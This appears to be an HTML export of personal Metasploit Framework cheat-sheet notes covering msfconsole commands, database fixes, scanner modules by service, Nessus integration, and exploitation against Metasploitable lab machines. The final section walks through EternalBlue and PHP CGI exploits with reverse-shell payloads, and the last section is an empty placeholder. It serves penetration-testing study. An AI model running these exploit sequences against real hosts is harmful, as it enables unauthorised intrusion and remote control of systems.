<!DOCTYPE html>
<html>
<head>
<title>metasploit_framework</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: "Open Sans", "JetBrains Mono", sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
</head>
<body>
<h1>Metasploit framework</h1>
<h1>Contents</h1>
<pre><code>MSF console usage
    Key switches (use msfconsole -h for full help)
    Modules
    MSF Basic Commands
        Core commands
        Selected other commands
    MSF Databases
        Database issues
            Fixing the collation warning/error
            Fixing the “SCRAM authentication requires libpq version 10 or above” error
        Default usage
            From terminal
            From msfconsole
        New database
            New user and database
            From msfconsole
        File formats currently supported by db_import
Enumeration
    nmap integration
        Directly from msfconsole (module)
        Directly from msfconsole (built in nmap)
        Importing scans
    SMB and samba
        Search services and all modules
        Common modules
    MySql
        Search services and all modules
        Common modules
    FTP
        Search services and all modules
        Common modules
    SSH
        Search services and all modules
        Common modules
    HTTP
        Search services and all modules
        Common modules
    SNMP
        Search services and all modules
        Common modules
    SMTP
        Search services and all modules
        Common modules
    Shodan with metasploit
        Search modules
        Common modules
Nessus integration
    From external file
    Nessus plugin
Selected exploits/gaining access
    Metasploitable 2 (linux - port 80): PHP CGI Argument Injection
    Metasploitable 3 (windows): MS17-010 EternalBlue SMB remote Windows Kernel Pool Corruption
    ( - port 1617): Java JMX Server Insecure Configuration Java Code Execution (java_jmx_server)
</code></pre>

<hr />
<h2>MSF console usage</h2>
<h3>Key switches (use msfconsole -h for full help)</h3>
<ol>
<li>msfconsole -q # quiet, no banner</li>
<li>msfconsole -r # use specified resource file (runcontrol)</li>
<li>msfconsole -x # execute specified console command (use ';' for command sequence)</li>
<li>msfconsole -H FILE # save command history to FILE</li>
<li>msfconsole -o FILE # output payload to FILE</li>
<li>msfconsole -m PATH # load additional module path  </li>
</ol>
<h3>Directory structure (MSF6 on Kali)</h3>
<ul>
<li>/opt/metasploit-framework/embedded/framework/ # executables, e.g. msfconsole</li>
<li>/opt/metasploit-framework/embedded/framework/modules # all modules</li>
<li>/opt/metasploit-framework/embedded/framework/data # e.g. for wordlists</li>
<li>/opt/metasploit-framework/embedded/framework/documentation # including developers_ guide.pdf </li>
</ul>
<h3>Modules</h3>
<ul>
<li>auxiliary</li>
<li>encoders</li>
<li>evasion</li>
<li>exploits</li>
<li>nops</li>
<li>payloads</li>
<li>post</li>
</ul>
<h3>MSF Basic Commands</h3>
<h4>Core commands</h4>
<ul>
<li>? or help # top level commands </li>
<li>help <command_name> # command specific help</li>
<li>color # enable or disable color</li>
<li>version</li>
<li>pwd/ifconfig/cd etc # drops unrecognised commands onto the shell</li>
<li>search <key_word>:<search_term> # see help search for key words</li>
<li>search <key_word>:<search_term> | grep <additional_search_term></li>
<li>history # displays command history</li>
<li>spool <file> # outputs history to <file></li>
<li>save # saves current config</li>
<li>use # use an exploit</li>
<li>show payloads # lists payloads for current exploit</li>
<li>set PAYLOAD <payload> </li>
<li>back # unloads current module</li>
</ul>
<h4>Selected other commands</h4>
<ul>
<li>show <param> # use help show for params</li>
<li>info # with exploit/payload/any module loaded</li>
<li>show options</li>
<li>show missing</li>
<li>
show advanced # can change with the following
<ul>
<li>show targets</li>
<li>show evasion</li>
</ul>
</li>
<li>set/setg/get/getg/unset/unsetg # set exploit/payload options</li>
<li>run/exploit/exploit -j</li>
<li>sessions # lists available</li>
<li>sessions -i <id> # interact with session <id></li>
<li>pushm/popm # pushes/pops the current module to stack, i.e. doesn't unload it, maintains the currently set options</li>
<li>listm # lists the current module stack</li>
<li>previous # loads the last module to be used</li>
</ul>
<h3>MSF Databases</h3>
<h4>Database issues</h4>
<h5>Fixing the collation warning/error</h5>
<pre><code># taking backups is always a good idea :-)
root@kali:~&gt; su postgres
su@kali:~&gt; pg_dump msf &gt; msf_backup.sql
su@kali:~&gt; pg_dump msf_test &gt; msf_test_backup.sql

su@kali:~&gt; psql -l # check for templates, both of the following may not be required

su@kali:~&gt; psql -d template0 -c &quot;ALTER DATABASE template0 REFRESH COLLATION VERSION;&quot;

su@kali:~&gt; psql -d template1 -c &quot;ALTER DATABASE template1 REFRESH COLLATION VERSION;&quot;

su@kali:~&gt; psql -d postgres -c &quot;ALTER DATABASE postgres REFRESH COLLATION VERSION;&quot;

su@kali:~&gt; psql -d msf -c &quot;ALTER DATABASE msf REFRESH COLLATION VERSION;&quot;
</code></pre>

<h5>Fixing the “SCRAM authentication requires libpq version 10 or above” error</h5>
<ul>
<li>Metasploit ships with an obsolete libpq.so (C library for connecting to postgresql) distribution</li>
<li>These libraries reside in /opt/metasploit-framework/embedded/lib</li>
<li>The correct versions reside in /usr/lib/x86_64-linux-gnu/</li>
<li>Remove or back up libpq.a, libpq.so, libpq.so.5, libpq.so.5.0</li>
<li>Copy in libpq.so.5 and libpq.so.5.16</li>
</ul>
<p>To fix:</p>
<pre><code># Make sure that postgresql is latest version (v 16.X at the time of writing)
systemctl stop postgresql   
apt-get remove postgresql
apt-get update
apt-get install postgresql
# Remove the old libraries (you might see libpq.so.5.9.*) and replace with the new (you should see libpq.so.5.16.*)
cd /opt/metasploit-framework/embedded/lib
rm libpq.*
cp /usr/lib/x86_64-linux-gnu/libpq.so.5
cp /usr/lib/x86_64-linux-gnu/libpq.so.5.16
</code></pre>

<h4>Default usage</h4>
<h5>From terminal:</h5>
<pre><code>root@kali:~&gt; msfdb # displays help
root@kali:~&gt; msfdb delete
root@kali:~&gt; msfdb init
root@kali:~&gt; msfconsole -q
</code></pre>

<h5>From msfconsole:</h5>
<pre><code>msf6&gt; db_status
msf6&gt; help database # shows available commands
msf6&gt; workspace -h # workspace commands
msf6&gt; workspace # lists available workspaces
msf6&gt; workspace -v # verbose list of available workspaces
msf6&gt; workspace -a &lt;workspace_name&gt; # adds a new workspace
msf6&gt; workspace &lt;workspace_name&gt; # switch to &lt;workspace_name&gt;
</code></pre>

<h4>New database</h4>
<h5>New user and database:</h5>
<pre><code>root@kali:~&gt; systemctl stop postgresql
root@kali:~&gt; systemctl start postgresql
root@kali:~&gt; cat /etc/passwd | grep postgres # check that user exists
root@kali:~&gt; su postgres # default installation has no password
su@kali:~&gt; psql -l
su@kali:~&gt; createuser &lt;new_user&gt; -P # then enter new password
su@kali:~&gt; createdb &lt;new_database&gt; --owner=&lt;new_user&gt;
su@kali:~&gt; psql -l # check that new database has been installed
</code></pre>

<h5>From msfconsole:</h5>
<pre><code>msf6&gt; db_status
msf6&gt; db_disconnect
msf6&gt; db_connect &lt;new_user&gt;:password@localhost:5432/&lt;new_database&gt;
msf6&gt; db_status

# Change /opt/metasploit-framework/config/database.yml to connect automatically
</code></pre>

<h4>File formats currently supported by db_import</h4>
<pre><code>Acunetix
Amap Log
Amap Log -m
Appscan
Burp Session XML
Burp Issue XML
CI
Foundstone
FusionVM XML
Group Policy Preferences Credentials
IP Address List
IP360 ASPL
IP360 XML v3
Libpcap Packet Capture
Masscan XML
Metasploit PWDump Export
Metasploit XML
Metasploit Zip Export
Microsoft Baseline Security Analyzer
NeXpose Simple XML
NeXpose XML Report
Nessus NBE Report
Nessus XML (v1)
Nessus XML (v2)
NetSparker XML
Nikto XML
Nmap XML
OpenVAS Report
OpenVAS XML
Outpost24 XML
Qualys Asset XML
Qualys Scan XML
Retina XML
Spiceworks CSV Export
Wapiti XML
</code></pre>

<h2>Enumeration</h2>
<h3>nmap integration</h3>
<h4>Directly from msfconsole (module)</h4>
<pre><code>search name:portscan type:auxiliary
</code></pre>

<h4>Directly from msfconsole (built in nmap)</h4>
<pre><code>db_nmap -v -sSU -A -Pn --top-ports 100 192.168.4.1/24
</code></pre>

<h4>Importing scans</h4>
<pre><code>db_import nmap.xml
</code></pre>

<h3>SMB and samba</h3>
<h4>Search services and all modules</h4>
<pre><code>services -S smb -u
search name:smb type:auxiliary
</code></pre>

<h4>Common modules</h4>
<pre><code>use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_ms17_010 # eternal blue detection
use auxiliary/admin/smb/list_directory
use auxiliary/scanner/smb/smb_enumshares 
use auxiliary/scanner/smb/smb_enumusers

See also (exploits):
    use exploit/windows/smb/ms17_010_psexec
    use exploit/windows/smb/ms17_010_eternalblue
    use exploit/windows/smb/psexec
</code></pre>

<h3>MySql</h3>
<h4>Search services and all modules</h4>
<pre><code>services -S mysql -u
search name:mysql type:auxiliary
</code></pre>

<h4>Common modules</h4>
<pre><code>use auxiliary/scanner/mysql/mysql_login
use auxiliary/admin/mysql/mysql_sql
use auxiliary/scanner/mysql/mysql_version
</code></pre>

<h3>FTP</h3>
<h4>Search services and all modules</h4>
<pre><code>services -S ftp -u
search name:ftp type:auxiliary
</code></pre>

<h4>Common modules</h4>
<pre><code>use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous
use auxiliary/ftp/ftp_login
</code></pre>

<h3>SSH</h3>
<h4>Search services and all modules</h4>
<pre><code>services -S ssh -u
search name:ssh type:auxiliary
</code></pre>

<h4>Common modules</h4>
<pre><code>use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_enumusers 
</code></pre>

<h3>HTTP</h3>
<h4>Search services and all modules</h4>
<pre><code>services -S http -u
services -S ssl -u
search name:http type:auxiliary
</code></pre>

<h4>Common modules</h4>
<pre><code>use auxiliary/scanner/http/http_version
use auxiliary/scanner/http/http_header
use auxiliary/scanner/http/options
use auxiliary/scanner/http/robots.txt
use auxiliary/scanner/http/title
use auxiliary/scanner/http/ssl
use auxiliary/scanner/http/ssl_version
use auxiliary/scanner/http/cert
use auxiliary/scanner/http/http_put
use auxiliary/scanner/http/trace
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/http_traversal
use auxiliary/scanner/http/crawler
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/backup_file
use auxiliary/scanner/http/http_login
</code></pre>

<h3>SNMP</h3>
<h4>Search services and all modules</h4>
<pre><code>services -S snmp -u
search name:snmp type:auxiliary
</code></pre>

<h4>Common modules</h4>
<pre><code>use auxiliary/scanner/snmp/snmp_enum
</code></pre>

<h3>SMTP</h3>
<h4>Search services and all modules</h4>
<pre><code>services -S smtp -u
search name:smtp type:auxiliary
</code></pre>

<h4>Common modules</h4>
<pre><code>use auxiliary/scanner/smtp/smtp_version
use auxiliary/scanner/smtp/smtp_enum
</code></pre>

<h3>Shodan with metasploit</h3>
<h4>Search modules</h4>
<pre><code>search name:shodan type:auxiliary
</code></pre>

<h4>Common modules</h4>
<pre><code>use auxiliary/gather/shodan_search # set SHODAN_APIKEY *************************
</code></pre>

<h2>Nessus integration</h2>
<h3>From external file</h3>
<pre><code>db_import &lt;nessus file&gt;
</code></pre>

<h3>Nessus plugin</h3>
<pre><code>msf6 &gt; load nessus
msf6 &gt; nessus_help
msf6 &gt; nessus_connect &lt;uid&gt;:&lt;pwd&gt;@192.168.4.23:8834 ssl_ignore
msf6 &gt; nessus_policy_list
Policy ID  Name  Policy UUID
---------  ----  -----------
15 discworld_network_01  ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66

msf6 &gt; nessus_scan_new ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66 scanFromMsf &quot;Scan from metasploit framework&quot; 192.168.4.1/24
msf6 &gt; nessus_scan_launch &lt;scan number&gt;
msf6 &gt; nessus_scan_stop &lt;scan number&gt;
msf6 &gt; nessus_scan_list
Scan ID  Name  Owner Started  Status Folder
-------  ----  ----- -------  ------ ------
5Discworld Network 01  dgolding   empty  2
8Discworld Network 01  dgolding   completed  2
12   discworld_network_01  dgolding   completed  3

msf6 &gt; nessus_db_import &lt;scan id&gt;
</code></pre>

<h2>Selected exploits/gaining access</h2>
<p>msf6 &gt; </p>
<h3>Metasploitable 2 (linux - port 80): PHP CGI Argument Injection</h3>
<pre><code>msf6 &gt; search cve:2012-1823

Matching Modules
================

   #  Name  Disclosure Date  Rank   Check  Description
   -  ----  ---------------  ----   -----  -----------
   0  exploit/multi/http/php_cgi_arg_injection  2012-05-03   excellent  YesPHP CGI Argument Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/php_cgi_arg_injection

msf6 &gt; use 0
msf6 &gt; set RHOSTS 192.168.4.32
msf6 &gt; exploit 

meterpreter &gt; 
</code></pre>

<h3>Metasploitable 3 (windows): MS17-010 EternalBlue SMB remote Windows Kernel Pool Corruption</h3>
<pre><code>msf6 &gt; vulns -S ms17-010
msf6 &gt; vulns -S ms17-010 192.168.4.36
msf6 &gt; use exploit/windows/smb/ms17_010_eternalblue
msf6 &gt; set PAYLOAD windows/meterpreter/reverse_tcp
msf6 &gt; set RHOSTS 192.168.4.36
msf6 &gt; run

meterpreter &gt;

msf6 &gt; use exploit/windows/smb/ms17_010_psexec
msf6 &gt; set PAYLOAD windows/meterpreter/reverse_tcp
msf6 &gt; set RHOSTS 192.168.4.36
msf6 &gt; set SMBDomain &lt;domain&gt;
msf6 &gt; set SMBUser &lt;user&gt;
msf6 &gt; set SMBPass &lt;password&gt;
msf6 &gt; run

meterpreter &gt;
</code></pre>

<h3>( - port 1617): Java JMX Server Insecure Configuration Java Code Execution (java_jmx_server)</h3>
<p>msf6 &gt;
msf6 &gt;
msf6 &gt;
msf6 &gt;
msf6 &gt;
msf6 &gt;
msf6 &gt;
msf6 &gt;
msf6 &gt;
msf6 &gt;</p>

</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
